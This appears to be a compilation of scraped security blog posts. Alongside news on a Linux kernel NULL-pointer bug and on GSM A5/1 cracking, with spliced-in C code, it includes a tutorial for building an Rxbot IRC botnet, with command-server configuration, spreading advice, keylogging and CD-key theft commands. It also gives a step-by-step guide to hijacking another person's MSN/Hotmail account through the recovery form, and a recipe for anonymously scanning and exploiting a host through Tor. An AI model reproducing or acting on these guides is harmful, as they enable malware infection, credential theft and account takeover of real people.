Dangerous Linux Kernel Vulnerability For ALL 2.4 & 2.6 Kernels

This is a serious bug: it affects all kernel versions released since May 2001, which goes all the way back to the early 2.4 versions.
It is also exploitable according to the report: "This issue is easily exploitable for local privilege escalation. In order to exploit this, an attacker would create a mapping at address zero containing code to be executed with privileges of the kernel" (which I would assume to be root).
At least it only allows local privilege escalation; if it were a remote root exploit in the kernel, it would be a disaster.
Imagine all the Linux boxes out there connected to the net where the admin doesn't update or read security resources.

Linux developers have issued a critical update for the open-source OS after researchers uncovered a vulnerability in its kernel that puts most versions built in the past eight years at risk of complete takeover.
The bug involves the way the kernel handles protocol operations, such as a protocol's sendpage handler, that are left unimplemented. Instead of pointing to a corresponding placeholder (for example, sock_no_accept for accept, or sock_no_sendpage for sendpage), the function pointer is left NULL. sock_sendpage does not validate the pointer before dereferencing it, leaving the OS open to local privilege escalation that can completely compromise the underlying machine.
"Since it leads to the kernel executing code at NULL, the vulnerability is as trivial as it can get to exploit," security researcher Julien Tinnes writes. "An attacker can just put code in the first page that will get executed with kernel privileges."
A patch has been released, so if you have untrusted local users on your system, UPDATE YOUR KERNEL NOW!
This is the second time this year there has been a serious exploit in the Linux kernel, which in a way is good because it means people are looking at it critically.
The more bugs that get exposed, the more secure the kernel and our operating systems become.

Tinnes and fellow researcher Tavis Ormandy released proof-of-concept code that they said took just a few minutes to adapt from a previous exploit they had. They said all 2.4 and 2.6 versions since May 2001 are affected.
Security researchers not involved in the discovery were still studying the advisory at time of writing, but at least one of them said it appeared at first blush to warrant immediate action.
"This passes my it's-not-crying-wolf test so far," said Rodney Thayer, CTO of security research firm Secorix. "If I had some kind of enterprise-class Linux system like a Red Hat Enterprise Linux…I would really go check and see if this looked like it related, and if my vendor was on top of it and did I need to get a kernel patch."
I wonder if any more major bugs will be disclosed before the end of the year? The fewer kernel updates that need to be carried out, the better in my book.
Full technical details of the bug can be found in the advisory:
Linux NULL pointer dereference due to incorrect proto_ops initializations
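To make the bug class concrete, here is an added example in plain user-space C (not from the advisory, the kernel source or this post): a model of a statically initialised operations table with one handler slot left NULL, the unchecked dispatcher that would jump to address zero, and the two defences the post describes, namely checking the pointer before the call and filling every slot with an explicit placeholder. All struct, table and function names here are invented for the demonstration; only sock_no_sendpage is named after its real kernel counterpart.

```c
/* Added example, not kernel code: a user-space model of the
 * "NULL function pointer in an ops table" bug class. */
#include <errno.h>
#include <stddef.h>
#include <stdio.h>

struct page { const char *data; size_t len; };
struct sock { const char *name; };

/* Modelled on the kernel's proto_ops: a protocol fills in the handlers it
 * supports. Any member a static initialiser does not mention is zero,
 * i.e. a NULL function pointer. */
struct proto_ops {
    int (*sendmsg)(struct sock *sk, const char *buf, size_t len);
    int (*sendpage)(struct sock *sk, struct page *pg, size_t off, size_t len);
};

static int demo_sendmsg(struct sock *sk, const char *buf, size_t len) {
    (void)buf;
    printf("%s: sendmsg %zu bytes\n", sk->name, len);
    return (int)len;
}

static int demo_sendpage(struct sock *sk, struct page *pg, size_t off, size_t len) {
    (void)pg; (void)off;
    printf("%s: sendpage %zu bytes\n", sk->name, len);
    return (int)len;
}

/* Explicit placeholder for protocols without page-based send, analogous
 * to the kernel's sock_no_sendpage(): fails cleanly instead of being NULL. */
static int sock_no_sendpage(struct sock *sk, struct page *pg, size_t off, size_t len) {
    (void)sk; (void)pg; (void)off; (void)len;
    return -EOPNOTSUPP;
}

/* Buggy table: sendpage is never assigned, so it is NULL. */
const struct proto_ops buggy_ops = { .sendmsg = demo_sendmsg };

/* Fixed table for a protocol that does not support sendpage: the slot
 * points at the placeholder. */
const struct proto_ops placeholder_ops = { .sendmsg = demo_sendmsg, .sendpage = sock_no_sendpage };

/* Table for a protocol that really implements sendpage. */
const struct proto_ops full_ops = { .sendmsg = demo_sendmsg, .sendpage = demo_sendpage };

/* Vulnerable dispatcher, the shape of the pre-fix caller: no NULL check.
 * With buggy_ops the call jumps to address 0; if an unprivileged user has
 * mapped code there, it runs in the caller's context, which in the kernel
 * is ring 0. Never call this with buggy_ops. */
int sendpage_unchecked(const struct proto_ops *ops, struct sock *sk,
                       struct page *pg, size_t off, size_t len) {
    return ops->sendpage(sk, pg, off, len);
}

/* Hardened dispatcher: refuses a missing handler instead of jumping to 0. */
int sendpage_checked(const struct proto_ops *ops, struct sock *sk,
                     struct page *pg, size_t off, size_t len) {
    if (ops == NULL || ops->sendpage == NULL)
        return -EOPNOTSUPP;
    return ops->sendpage(sk, pg, off, len);
}

/* Audit helper: is every handler slot populated? Run over every ops
 * table at build or boot time, this catches the bug before any caller
 * can reach the NULL slot. */
int ops_table_complete(const struct proto_ops *ops) {
    return ops->sendmsg != NULL && ops->sendpage != NULL;
}

int main(void) {
    struct sock sk = { "demo-socket" };
    struct page pg = { "hello", 5 };
    printf("buggy table complete: %d\n", ops_table_complete(&buggy_ops));
    printf("placeholder table complete: %d\n", ops_table_complete(&placeholder_ops));
    printf("checked sendpage, buggy table: %d\n",
           sendpage_checked(&buggy_ops, &sk, &pg, 0, pg.len));
    printf("checked sendpage, placeholder table: %d\n",
           sendpage_checked(&placeholder_ops, &sk, &pg, 0, pg.len));
    printf("checked sendpage, full table: %d\n",
           sendpage_checked(&full_ops, &sk, &pg, 0, pg.len));
    return 0;
}
```

Compile with any C99 compiler and run it: the buggy table reports incomplete, and the checked dispatcher returns -EOPNOTSUPP for it instead of crashing. The kernel fix took the checked-dispatcher route, validating the pointer before the call; populating every slot with a placeholder is the defensive complement that makes an audit like ops_table_complete() pass.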

Cracking GSM phone crypto

If you are using a GSM phone (AT&T or T-Mobile in the U.S.), you likely have a few more months before it will be easy for practically anyone to spy on your communications.
Security researcher Karsten Nohl is launching an open-source, distributed computing project designed to crack the encryption used on GSM phones and compile it into a code book that can be used to decode conversations and any data that gets sent to and from the phone.

(Image: Karsten Nohl talks about his distributed computing, open-source A5/1 cracking project at the Hacking at Random conference. Credit: Hacking at Random)
He hopes that by doing this it will spur cellular providers into improving the security of their services and fixing a weakness that has been around for 15 years and affects about 3 billion mobile users.
"We're not generating a vulnerability but publicizing a flaw that's already being exploited very widely," he said in a phone interview Monday.
"Clearly we are making the attack more practical and much cheaper, and of course there's a moral question of whether we should do that," he said. "But more importantly, we are informing (people) about a longstanding vulnerability and hopefully preventing more systems from adopting this."
This weakness in the encryption used on the phones, A5/1, has been known about for years. There are commercial tools that allow decrypting GSM communications, ranging in price from $100,000 to $250,000 depending on how fast you want the software to work, said Nohl, who previously has publicized weaknesses in wireless smart card chips used in transit systems.
It will take 80 high-performance computers about three months to do a brute force attack on A5/1 and generate a large look-up table that will serve as the code book, said Nohl, who announced the project at the Hacking at Random conference in the Netherlands 10 days ago.
Using the code book, anyone could get the encryption key for any GSM call, SMS message, or other communication encrypted with A5/1 and listen to the call or read the data in the clear. If 160 people donate their computing resources to the project, it should only take one and a half months to complete, he said.
Participants download the program and three months later share the files created with others, via BitTorrent, for instance, Nohl said. "We have no connection to them," he added.
Once the look-up table is created it would be available for anyone to use.
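To show what such a code book actually does, here is an added example in C (not from the article or from Nohl's project): an A5/1 keystream generator with the published register sizes, taps and majority clocking, plus a toy code book built over a key space reduced to 16 bits so that it can be generated in seconds. Given the keystream observed for an unknown key in that space (in practice recovered from known plaintext), a binary search returns the key with no further computation, which is the precompute-once, look-up-many pattern the project spreads over volunteers. The 16-bit key space, the fixed frame number and all names in the code are assumptions made for the demonstration; the real tables cover a useful fraction of a 2^64 state space, which is where the months of machine time go.

```c
/* Added example, not the project's code: A5/1 keystream generation and a
 * toy code book over a reduced key space. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Register masks (19, 22, 23 bits), majority-clocking bits and feedback taps. */
#define R1MASK 0x07FFFFu
#define R2MASK 0x3FFFFFu
#define R3MASK 0x7FFFFFu
#define R1MID  (1u << 8)
#define R2MID  (1u << 10)
#define R3MID  (1u << 10)
#define R1TAPS 0x072000u   /* bits 18,17,16,13 */
#define R2TAPS 0x300000u   /* bits 21,20 */
#define R3TAPS 0x700080u   /* bits 22,21,20,7 */

struct a51 { uint32_t r1, r2, r3; };

static uint32_t parity(uint32_t x) {
    x ^= x >> 16; x ^= x >> 8; x ^= x >> 4; x ^= x >> 2; x ^= x >> 1;
    return x & 1;
}

/* Shift one LFSR by a step, feeding back the parity of its tap bits. */
static uint32_t clock_reg(uint32_t reg, uint32_t mask, uint32_t taps) {
    return ((reg << 1) & mask) | parity(reg & taps);
}

/* Irregular clocking: a register steps only if its clocking bit agrees
 * with the majority of the three clocking bits. */
static void clock_majority(struct a51 *s) {
    uint32_t b1 = (s->r1 & R1MID) != 0, b2 = (s->r2 & R2MID) != 0, b3 = (s->r3 & R3MID) != 0;
    uint32_t maj = (b1 + b2 + b3) >= 2;
    if (b1 == maj) s->r1 = clock_reg(s->r1, R1MASK, R1TAPS);
    if (b2 == maj) s->r2 = clock_reg(s->r2, R2MASK, R2TAPS);
    if (b3 == maj) s->r3 = clock_reg(s->r3, R3MASK, R3TAPS);
}

/* Regular clocking used while loading key and frame: all three step and
 * the input bit is XORed into bit 0 of each. */
static void clock_all_with(struct a51 *s, uint32_t bit) {
    s->r1 = clock_reg(s->r1, R1MASK, R1TAPS) ^ bit;
    s->r2 = clock_reg(s->r2, R2MASK, R2TAPS) ^ bit;
    s->r3 = clock_reg(s->r3, R3MASK, R3TAPS) ^ bit;
}

/* Load the 64-bit session key (LSB of key[0] first) and the 22-bit frame
 * number, then run the 100 mixing clocks whose output is discarded. */
void a51_setup(struct a51 *s, const uint8_t key[8], uint32_t frame) {
    s->r1 = s->r2 = s->r3 = 0;
    for (int i = 0; i < 64; i++) clock_all_with(s, (key[i / 8] >> (i & 7)) & 1);
    for (int i = 0; i < 22; i++) clock_all_with(s, (frame >> i) & 1);
    for (int i = 0; i < 100; i++) clock_majority(s);
}

static uint32_t a51_bit(struct a51 *s) {
    clock_majority(s);
    return ((s->r1 >> 18) ^ (s->r2 >> 21) ^ (s->r3 >> 22)) & 1;
}

/* First nbits of keystream packed MSB-first into an integer (nbits <= 64). */
uint64_t a51_keystream(const uint8_t key[8], uint32_t frame, int nbits) {
    struct a51 s;
    uint64_t out = 0;
    a51_setup(&s, key, frame);
    for (int i = 0; i < nbits; i++) out = (out << 1) | a51_bit(&s);
    return out;
}

/* ---- Toy code book: 16-bit key space, fixed frame (demo assumptions) ---- */
#define DEMO_FRAME  0x134u
#define DEMO_KEYS   65536
#define PREFIX_BITS 64

struct entry { uint64_t prefix; uint16_t key; };

static int cmp_entry(const void *a, const void *b) {
    uint64_t x = ((const struct entry *)a)->prefix, y = ((const struct entry *)b)->prefix;
    return x < y ? -1 : x > y;
}

/* Precompute keystream prefix -> key for every key in the reduced space.
 * This is the expensive do-once step that the distributed project splits
 * across volunteers' machines. */
struct entry *build_codebook(void) {
    struct entry *book = malloc(sizeof(*book) * DEMO_KEYS);
    for (uint32_t k = 0; k < DEMO_KEYS; k++) {
        uint8_t key[8] = {0};                  /* remaining 48 key bits fixed at 0 */
        key[0] = (uint8_t)(k & 0xFF);
        key[1] = (uint8_t)(k >> 8);
        book[k].prefix = a51_keystream(key, DEMO_FRAME, PREFIX_BITS);
        book[k].key = (uint16_t)k;
    }
    qsort(book, DEMO_KEYS, sizeof(*book), cmp_entry);
    return book;
}

/* Look up an observed keystream prefix; returns the key or -1 if absent. */
int lookup_key(const struct entry *book, uint64_t observed) {
    struct entry probe = { observed, 0 };
    const struct entry *hit = bsearch(&probe, book, DEMO_KEYS, sizeof(*book), cmp_entry);
    return hit ? hit->key : -1;
}

int main(void) {
    struct entry *book = build_codebook();
    uint8_t secret[8] = { 0x5A, 0xC3, 0, 0, 0, 0, 0, 0 };   /* "unknown" key in the reduced space */
    uint64_t seen = a51_keystream(secret, DEMO_FRAME, PREFIX_BITS);
    printf("observed keystream prefix: %016llx\n", (unsigned long long)seen);
    printf("code book says key = 0x%04x\n", lookup_key(book, seen));
    free(book);
    return 0;
}
```

The lookup is O(log n) against a sorted table, so once the table exists the per-call cost is negligible; that asymmetry, not any cleverness in the cipher attack, is what makes a shared code book worth months of precomputation. The self-check here is only structural (determinism, key and frame sensitivity, lookup), so compare the generator against a known test vector before relying on it for anything beyond the demonstration.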
Distributed computing, which has long been used for research and academic purposes, as in SETI@home, and which companies have built businesses around, not only solves the technical hurdle to cracking the A5/1 code, but it could solve the legal ones as well.
A few years ago a similar GSM cracking project was embarked on but was halted before it was completed after researchers were intimidated, possibly by a cellular provider, Nohl said. By distributing the effort among participants and not having it centralized, the new effort will be less vulnerable to outside interference, he said.
Nohl wasn't certain of the legal ramifications of the project but said it's likely that using such a look-up table is illegal but possession is legal, given that companies openly advertise their tables for sale.
A T-Mobile spokeswoman said the company had no comment on the matter.
AT&T spokesman Mark Siegel said, "We take great care to protect the privacy of our customers and use a variety of tools, many technical and some human approaches. I can't go into the details for security reasons." He declined to elaborate or comment further.
Taking precautions
Carriers should upgrade the encryption or move voice services to 3G, which has much stronger encryption, Nohl said.
In the meantime, people can use separate encryption products on the phone, like Cellcrypt, or handsets with their own encryption, Nohl said. Amnesty International and Greenpeace are using phones with stronger encryption, for example, but it only works if both parties to a conversation are using the same technology, he said.
For data encryption there is Pretty Good Privacy (PGP) for e-mail and virtual private network (VPN) software for connecting to a corporate network, he said.
The encryption problem is serious for people doing online banking, where banks are using text messages as authentication tokens. Banks should instead offer RSA SecurID tokens or send one-time pass phrases through regular mail, Nohl said.
"I reckon, potentially, this could have as much impact as the breaking of WEP (Wired Equivalent Privacy) had a few years ago," said Stan Schatt, security practice director at ABI Research. "That shook up the industry a bit."
As a result of breaking that encryption, enterprises were reluctant to rely on wireless LANs, so the Wi-Fi Alliance pushed through an interim standard that strengthened the encryption method, he said.
"Vendors will jump in with interim solutions, like Cellcrypt," Schatt said. "Mobile operators themselves will have to jump in and offer additional levels of encryption as part of a managed service offering for people who want a higher level of encryption."
However, consumers aren't likely to want to pay extra for the boosted encryption strength, he said.
To snoop on someone's phone, a would-be spy would need to be within eyesight of the target, Schatt said. Or, spies could point a recording device in the direction of a building and grab whatever conversations were nearby, he said.
"If you stand outside a building of a competitor you could get conversations between product managers and about sensitive corporate information, like acquisitions," he said. "Corporations put even more sensitive information over their phones, in general, than we do over their e-mail."
The project web page is here and the talk with slides is here.
Source: cnet.com

How to Disable the Remote Registry Service in Windows

The "Remote Registry" service lets remote users read and change registry settings on your computer. By default, the "Startup type" of the "Remote Registry" service may be set to "Automatic" or "Manual", which is an unnecessary exposure on a single-user PC or a laptop that nobody administers remotely. Remote access still requires Windows authentication, so the practical risk is that an attacker who has obtained credentials for an account on the machine can change settings over the network without ever logging on interactively.
So, to make sure that only users logged on to your computer can alter the registry, disable the "Remote Registry" service.

Here is how it can be done:

1. Click Start and pick Control Panel from the Start Menu items.

2. If your Control Panel is showing items in Classic View, find the icon named Administrative Tools and double-click it.

Alternatively, if you are in Category View, click Performance and Maintenance and then click Administrative Tools.

3. Now double-click the Services applet, which is used to start, stop and configure Windows services on your computer. This opens the Services window listing all the Windows services.
4. In the right pane of the Services window, find the service named Remote Registry.


5. Double-click the "Remote Registry" service, which shows the Remote Registry Properties for your local computer.

Press the Stop button first to stop the running service, then pick Disabled from the drop-down menu under 'Startup type' and click Apply, then OK.

6. Close the "Services" window. The change takes effect as soon as the service is stopped; a restart is not required, though it does no harm.

That's it! You have disabled the "Remote Registry" service on your computer to prevent remote changes to the registry. Note that some domain management and remote administration tools depend on this service, so on a company-managed machine check with your administrator before disabling it.

How To Create And Compile Botnets To Auto-hack Thousands of Systems

I found a nice tutorial that helps you with the basics of botnets.
In addition to the Rxbot 7.6 mod used in this tutorial, you can also use another good source: rx-asn-2-re-worked v3, a stable mod of rxbot that is 100% functional and not crippled. If you want to download it, you can below:

Download
Compiling is the same as it would be with Rxbot 7.6. I prefer this source, but it would ultimately be best to compile your own bot or get a private one.

Q: What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC (secretly; they don't know this). Once done, the computer is referred to as a "zombie".
Depending on the source you used, the bot can do several things.
I myself have helped write one of the most advanced and secure bot sources out there.
(Off topic)
But once again, depending on the source, you can:
keylog their computer, take pictures of their screen, turn on their webcam and take pics/movies, harvest CD keys and game keys or even cracks, passwords, AIM screen names, emails; you can also spam, flood, DDoS, ping, packet, yada yada; some have built-in MD5 crackers, and clone functions to spam other IRC channels and overrun a channel and even perform IRC "takeovers".
Once again, depending on the bot, it may be able to kill other competitor bots.
Or even kill AV/FW upon startup.
Add itself to the registry.
Open sites.
Open commands:
cmd,
notepad,
html,
Anything is possible!

There are the infected computers ("bots"), the attacker, the server, and the victim.

Quote:
while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.

Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."

Botnets are being used for Google Adword click fraud, according to security watchers.

Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on a public IRC server, but I would recommend a private, password-protected server. I will set up bots for people if they have something to offer.
---------------
Ignore anything about using the server editor, but this tutorial shows how to make an IRC channel and spread bots:
Download tutorial

-----------------------------
Here we go ladies and gentlemen 
Follow the tutorial:
-----------------------------

I. Setting up the C++ compiler: (easy)

1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Mirror 2
Mirror 3 Direct
Pass: itzforblitz
Serial: 812-2224558

2. Run setup.exe and install. Remember to input the serial.

3. Download and install the Service Pack 6 (60.8 mb)

4. After that Download and install:

Windows SDK (1.2 mb)
Mirror 2
Mirror 3
Pass: itzforblitz
-------------------------------------

II. Configuring the C++ compiler (easy)

1. Open up Microsoft Visual C++ 6.0
2. Go to Tools > Options and click the "Directories" tab
3. Now browse to these directories and add them to the list (click the dotted box to add):
Quote:
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIB

4. Now put them in this order (use the up and down arrows):


(it does not matter what's below those lines)
---------------------------------------

III. Configuring your bot: (easy)

1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Mirror 2
Mirror 3

2. You should see an Rxbot 7.6 folder
3. Open Rxbot 7.6 > configs.h and edit these lines only:

Quote:
Put in quotations:
char password[] = "Bot_login_pass"; // bot password (Ex: monkey)
char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)
char serverpass[] = ""; // server password (not usually needed)
char channel[] = "#botz_channel"; // channel that the bot should join
char chanpass[] = "My_channel_pass"; // channel password

Optional:
char server2[] = ""; // backup server
char channel2[] = ""; // backup channel
char chanpass2[] = ""; //Backup channel pass

-----------------------------------
IV. Building your bot: (very easy)

1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right-click "rBot Files" and click Build:


5. rBot.exe will be in the Rxbot 7.6 > Debug folder!

You're done! Now get the rBot and pack it (use the tool in the third post: open rBot and click "Protect") and send it to some idiots. Follow the tutorial on top to learn how to spread. Some good ways are: torrents, AIM, friends, MySpace, school computers, and P2P, but there are more ways. ENJOY!
-------------------------------------
Command list
Download Command list

Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC

mIRC
Mirror 2
Mirror 3
--------------------------------------------------------------------------------------------
How to secure your bots:

Don't be an ~censored~; it is easy to steal bots. All you need is the IRC server address and maybe a key.
To steal bots, watch for the @login key. One must upload their bot to a direct link (tdotnetwork is excellent),
update the channel topic and run:

The http://mybot.com is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel ;)
To find the server address you need one of their bots. Take their bot and open it in the server editor. The address will be shown, and so will the password and other needed information.

To secure yourself:

It is fairly easy to secure your bots; here is how:

1. When you are in your channel, right-click on your chat window and select "Channel Modes"
2. Make sure these options are checked:

This way no one besides you or another op can set the channel topic (the mode that restricts topic changes to operators, +t).
Note: Setting "Moderated" (+m) is good for when you are not there, because anyone who is not voiced (+v) or an op (+o) cannot talk. They will still log in and follow commands; however, there will be no output.
------------------------------------------------------------------------
Good IRC Servers:

I would recommend running your botnet on a private server.
If you would like to set up a botnet on a certain server, do not just intrude and make one. Talk to the admin and make sure he knows that the IRC server is not doing anything illegal. If an admin refuses, don't get angry. It is his/her server after all.

How to Hack MSN Passwords the Best and Easy Way


It's basically a way of getting your email back if it has been stolen, but I have come to realise that this can also be used to gain access to someone's MSN. In other words, whoever sends you an email from a @hotmail, @live or @msn address, you can gain access to their Hotmail, no joke. Follow the tutorial below.

Well, I don't know if you guys have found this yet, but I have known about it for a few months now.
Windows Live has a revert link; you go to this link and it will ask you questions such as your full name, etc. All the information you need can be obtained from an email from the victim. Once the form has been filled in like it says in the tutorial, click send, and 12 to 24 hours later you will receive an email from Windows Live asking you to set a new password for the victim's email. It must be the easiest way to gain access to someone's MSN, yet not many people know about it. Well, if you guys don't know about it, I will be happy to share it with you.

Tutorial:

What you will need:
Revert Link: https://support.live.com/eform.aspx?prod...ct=eformcs

IP Get 1.50 (MSN Plus! plugin):
http://rapidshare.com/files/115918445/IPGet1.50.zip

1. To start off, go to the revert link. You will see a form where you need to fill in some information on the person you're going to revert; don't let the size of the form put you off, since it takes about 5 minutes to fill in.

2. The first box will ask you to fill in the person's full name. Use some social engineering to get them to email you. Once you receive the email from them, it should have their full name next to the contact you received it from, e.g. "Forename Surname".

3. Next it will ask for the e-mail address for them to send a response to. This explains itself: put your email address in.

4. Below your email address it should ask for the primary e-mail address/member ID associated with the account you're inquiring about. This is the email address of the person you want to revert.

5. It will then ask you for a date of birth. This makes you think you have no chance... All you need to do is use some social engineering once again to try and get their year of birth; no need for month or day. I personally have found that you don't need this, so I always put 1992 and it always seems to work.

6. Next is the country; this is simple to get. Don't forget Hotmail checks this information via the IP address last logged on to the account, the same way they find this information on anyone. I will explain how to get their IP further into this tutorial. Basically ask for the country or use the method further on in the tutorial.

7. It will then ask you for the state. Once again you can gain this information via the IP. This will also be explained later on in the tutorial.

8. Now you will need the ZIP or post code. This makes you think "oh there is no point, I cannot get it", well, you're wrong, it is simple to get, once again... I will explain further on in the tutorial how to get this. YOU ONLY NEED THE BEGINNING OF THE POST CODE!

9. It will ask you for the secret answer to your question. You won't need this; fill it in with "I cannot remember".

10. You will now be asked for the alternate e-mail; put the email you used in step 4.

Now that you have this you can fill out the rest of the form. Once you have the IP, go to http://ip-adress.com; there will be a link at the bottom. Click on it and a new page should come up with a small box. Put the IP in the box and click "locate IP or web-site". It should now come up with all the information you need.

11. OK, this is the main part of the tutorial on how to gain most of the information via the IP. If you have MSN Plus!, download the MSN Plus! IP Get script and import it. Sign out of MSN once imported, then back in. All you need to do now to gain the IP address of your target is send them a file, wait for them to accept, then cancel it, or send them a voice clip. You should then receive a small pop-up in the bottom corner of your screen showing the IP address and the email address of the person.

Fill in steps 6 & 7 with the information shown for this IP.

To get the zip/post code, zoom in on the map on http://ip-adress.com and grab the closest street shown on the map to where the IP has been located. Now go onto Google and type in the state shown and the street you zoomed in on, e.g. "London, Waterloo postcode", then look it up. London, Waterloo should be SE1. Remember... YOU ONLY NEED THE BEGINNING OF THE POST CODE!

12. Keep http://ip-adress.com open for this step, since you will now need the ISP (Internet service provider) shown.

13. It will now ask you for the last date and time you successfully signed in; put "Today".

Congrats! You have filled in all the information you need. To give this revert more of a chance of working, keep reading and fill in a bit more information!

14. Scroll down a bit until you see "Names of contacts in your Hotmail address book". Fill in the email addresses of a few people, like 2-3, on their contact list (get people to add them if you don't know any) and fill it in as shown:
example@domain.com, example@domain.com, but obviously put in the information needed for YOUR own revert.

15. You will then be asked for subjects of any old mail that's in your Hotmail inbox. If they play Habbo, put "Habbo" in this. Maybe if they have an eBay/PayPal account, send a password reset email, then put "Ebay" or "Paypal" in this box, or maybe more than one.

16. It will once again ask you for the names of contacts on your Messenger contact list. Use the same information shown in step 14.

17. You will now be asked for the messenger nickname (display name). Copy the MSN name of the person you're reverting and paste it into this box. Scroll down and click submit.

Congratulations! You have now completed the tutorial on how to revert someone's MSN. Wait 24 hours for the reply!
If you followed this tutorial properly you have a 99% chance of it working.

How To Perform Anonymous Port Scanning Using Nmap and Tor

Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables developers and researchers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.
The Onion Router (Tor) is an excellent piece of work towards defending online privacy. As with every debate about exploitation frameworks, security tools and vulnerability disclosures, such projects have also been the victim of criticism, and of debates about the potential abuse they may enable, the dangers of teaching individuals a dangerous and potentially illegal craft, and of giving them a 'secure' channel to hide their online presence. But let's face it, the bad guys already know about it (that is the reason they're bad, eh). Although these channels of misuse and abuse do exist and cannot be ignored, the merits will always outweigh the harm the black-hat community may cause.
Regrettably, in the country I live in, even most of the senior technical people I meet, see or have a chance to work with don't have a clue about online privacy or the security of their information.
Privacy is every individual's right, and is as important as any other basic human need. You will never want somebody tracking your IP, spyware tracing your network activity, or, the next time you try to experiment with something, a nasty little e-mail from an ISP admin saying that you were doing so-and-so. I am in no way TEMPTING you to do something wrong. It's all about your morals and motivation :) , the small how-to below is a kick starter for getting started with Tor and experimenting with some stuff securely. Interested? Move on, but don't go about emailing me that stuff like this is illegal to post and ought to be removed.

The problem

A basic issue for the privacy-minded is that the recipient of your communication (or anyone else along the way) can see that you sent it by looking at the IP headers, or worse, trace the whole path. So can authorized intermediaries like ISPs and government organizations, and sometimes unauthorized intermediaries as well. A very simple type of network traffic analysis might involve sitting somewhere between sender and recipient on the network (man-in-the-middle) and looking at headers.
But there are also more powerful kinds of traffic analysis. Some attackers spy on multiple parts of the Internet and use sophisticated statistical techniques to track the communication patterns of many different organizations and individuals. Encryption does not help against these attackers, since it only hides the content of Internet traffic, not the headers (VPN? duh!!).

The solution:
A distributed, anonymous, secure network

Distributing your traffic over several places/servers, so that no single point can link you to your destination, reduces the risk of both simple and sophisticated traffic analysis and helps defend your privacy. It's like taking a zig-zag, random, hard-to-follow path to deceive somebody who is tracing you (what the heroes usually do against the villain in action films :) ), then periodically erasing your footprints. Instead of taking a direct route from source to destination, data packets on Tor take a random pathway through several servers that cover your tracks, so no observer at any single point can tell where the data came from or where it is going.
Tor incrementally builds a circuit of encrypted connections through servers on the network. The circuit is extended one hop at a time, and each server along the way knows only which server gave it data and which server it is giving data to. No individual server ever knows the whole path that a data packet has taken. The client negotiates a separate set of encryption keys for each hop along the circuit to make sure that no single hop can trace these connections as they pass through.
Once a circuit has been established, any data can be exchanged, and because each server sees no more than one hop in the circuit, neither an eavesdropper at one point nor a single compromised server can use traffic analysis to link the connection's source and destination.
Tor only works for TCP streams and can be used by any application with SOCKS support.
To experiment and write this small how-to, I set up a server on the Internet that I wanted to scan from my home network using Nmap, Nessus and Metasploit from my BackTrack installation in a VM. Here are the steps I followed to launch the scan / exploitation through Tor:
A. Installing Tor: detailed instructions can be found on the Tor web site.
B. Download socat. This tool is an excellent multipurpose relay and will allow you to set up a local TCP listener that tunnels connections through the Tor SOCKS server (listening on port 9050).
Unfortunately socat is available only on BSD and *nix systems. To make use of Tor on Windows I would recommend using Privoxy, or better, installing the whole TorCP bundle.

Let us assume that the IP address of the host I wanted to scan was 202.163.97.20.
I invoked socat:
[talha@localhost#] ./socat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1:202.163.97.20:80,socksport=9050
The above command makes socat listen on port 8080 and tunnel every incoming connection to 202.163.97.20 (port 80) through the Tor SOCKS server. Note the address form: SOCKS4:<socks-server>:<target-host>:<target-port>, with no spaces, and the socksport option attached with a comma. Give the target as a numeric IP: socat's SOCKS4 address type resolves a host name locally, which would leak a DNS query outside Tor (its SOCKS4A address type hands the name to the proxy instead, if you must use a name).
For use on Windows you will need to:
1. Install Privoxy.
2. Allow HTTP CONNECT requests to port 80 through your firewall.
3. Browse to http://config.privoxy.org/show-status
C. I assume Nmap, Nessus and Metasploit are already installed and running. If not, you can find detailed instructions on the respective websites.
D. Launch an Nmap connect scan (-sT, with -Pn to skip host discovery and -n to skip DNS) or a Nessus scan against 127.0.0.1 port 8080. Configure Nessus to limit the scan to port 8080 in the "Scan Options" tab.
Here are some of the entries in my Apache log that were a result of the scan:
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /Agents/ HTTP/1.1" 404 205 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:56 -0700] "GET /cgi-bin/viewpic.php?id=7&conversation_id=&btopage=0 HTTP/1.1" 404 217 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
212.9.32.5 - - [10/Jul/2005:17:29:57 -0700] "GET /index.php?err=3&email= HTTP/1.1" 404 207 "-" "Mozilla/4.75 [en] (X11, U; Nessus)"
